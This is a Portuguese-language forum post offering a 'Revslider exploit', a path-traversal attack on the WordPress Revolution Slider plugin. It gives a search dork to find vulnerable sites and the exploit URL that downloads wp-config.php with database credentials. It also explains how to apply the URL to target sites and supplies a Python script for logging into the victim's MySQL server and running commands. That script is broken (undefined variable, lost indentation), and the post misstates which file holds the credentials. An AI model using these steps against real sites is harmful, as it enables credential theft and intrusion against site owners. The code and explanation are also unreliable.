Revslider Exploit

#1
Vou compartilhar com vcs uma falha que aprendi ja faz um tempo e afeta muitos sites até hj que funciona executando um código na URL que baixa as configurações MySQL do site alvo, esse arquivo se chama admin-ajax.php e contém informações sobre o server MySQL do site, como por exemplo o usuário e a senha

Dork: revslider.php "index of" (existem outras, porém não lembro mais rs)
Exploit: /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

Depois de vcs encontrarem o alvo, vão substituir uma parte da URL pelo exploit e automaticamento irá fazer o download
exemplo: site.com.br/wp-content/plugins/revslider/ (NORMAL)
site.com.br/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php (EXPLOIT)

Image
Image

Conectando com Python:

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import MySQLdb
import sys

target = raw_input("HOST: ")
usuario = raw_input("Usuário: ")
senha = raw_input("Senha: ")
#dbname = raw_input("DBName: ") Descomente a linha se quiser definir um banco de dados especifico (em alguns casos é necessario)

#tentando criar uma conexão
try:
MySQLdb.connect(host=target, user=usuario, passwd=senha)
cur = db.cursor()
#executando comandos dentro do servidor
cur.execute(" Digite o comando aqui")

#mostra o resultado do comando
for resultado in cur:
print(resultado)

except Exception as error:
print("Ocorreu algum erro: ", error)
1 x
eu n escolhi ser o escolhido, escolhi ser a escolha